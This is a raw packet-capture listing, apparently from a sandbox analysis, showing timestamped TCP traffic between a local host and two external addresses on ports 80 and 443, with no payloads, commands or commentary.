Aug 10, 2024 16:12:24.311417103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311419010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311440945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311455011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311466932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311484098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311495066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311518908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311521053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311521053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311521053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311521053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311532974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311549902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311563015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311577082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311589956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311589956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311589956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311589956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311616898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311616898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311619043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311634064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311709881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311709881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.311939001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311953068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.311968088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312024117 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312024117 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312024117 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312052965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312067986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312081099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312094927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312108994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312197924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312197924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312222004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312283993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312298059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312313080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312326908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312341928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312341928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312356949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312370062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312414885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312414885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312414885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312414885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312521935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312536001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312551022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312571049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312577963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312596083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312602997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312611103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312633991 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312633991 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312635899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312647104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312649965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312664032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312669992 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312679052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312691927 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312702894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312707901 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312719107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312735081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312748909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.312793016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312793016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312793016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.312793016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313309908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313323975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313337088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313361883 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313361883 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313395023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313409090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313422918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313431025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313437939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313534021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313548088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313564062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313577890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313589096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313589096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313589096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313589096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313592911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313642025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313642025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313642025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313678026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313693047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313713074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313724995 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313750029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313750029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.313819885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313833952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.313849926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.314409018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.314424038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.314438105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.314452887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.314476967 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.314476967 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.314476967 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.314490080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.314637899 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.365227938 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.365303040 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.365377903 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.365426064 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.365438938 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.365468025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.365477085 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.365500927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.365534067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.365535975 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.365537882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.365537882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.365540028 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.365566015 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.365587950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.365598917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.365609884 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.365613937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.365629911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.365645885 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.365663052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.365830898 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.386544943 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.386667013 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.386674881 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.386817932 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.386928082 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.386940956 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.386971951 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.386996984 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.387000084 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.387042046 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.387042046 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.387346983 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.387391090 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.387412071 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.387443066 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.387470007 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.387480021 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.387785912 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.387799025 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.387867928 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.387872934 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.388062000 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.388369083 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.388411045 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.388444901 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.388452053 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.388462067 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.388504982 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.388556957 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.388562918 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.388829947 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.389666080 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.389678001 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.389735937 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.389739990 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.389765024 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.389765024 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.390017033 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.390062094 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.390065908 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.390084028 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.390108109 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.390124083 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.393261909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393297911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393332005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393361092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.393388033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.393405914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393436909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393470049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393501997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393522978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.393542051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.393543959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393594027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393625975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393637896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.393656969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393688917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393719912 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393733025 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.393754959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393786907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393798113 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.393819094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393850088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393862009 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.393882036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393915892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393922091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.393948078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393980026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.393991947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394011021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394042969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394052029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394074917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394105911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394126892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394136906 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394140005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394174099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394181013 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394241095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394247055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394357920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394386053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394418001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394449949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394454002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394464970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394489050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394499063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394530058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394578934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394579887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394613981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394666910 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394762993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394805908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394812107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394845009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394861937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394881964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394911051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394917965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394937038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.394949913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394982100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.394993067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395014048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395050049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395066023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395081043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395102024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395107985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395116091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395129919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395131111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395138979 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395143986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395153999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395169973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395183086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395718098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395731926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395746946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395761013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395766973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395776033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395786047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395798922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395808935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395823002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395829916 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395838022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395843029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395852089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395854950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395868063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395873070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395889044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395891905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395905972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395905972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395920038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395936012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395946026 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395957947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395968914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.395972967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.395994902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396008015 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396012068 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396022081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396029949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396035910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396050930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396053076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396063089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396073103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396105051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396652937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396667957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396682978 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396697044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396711111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396723032 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396727085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396740913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396745920 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396754980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396780014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396780968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396795988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396810055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396831036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396842003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396847963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396850109 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396873951 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396883965 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396892071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396908045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396922112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396931887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396936893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.396954060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396964073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.396981955 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397020102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397032976 CEST	80	49739	147.45.44.104	192.168.2.4
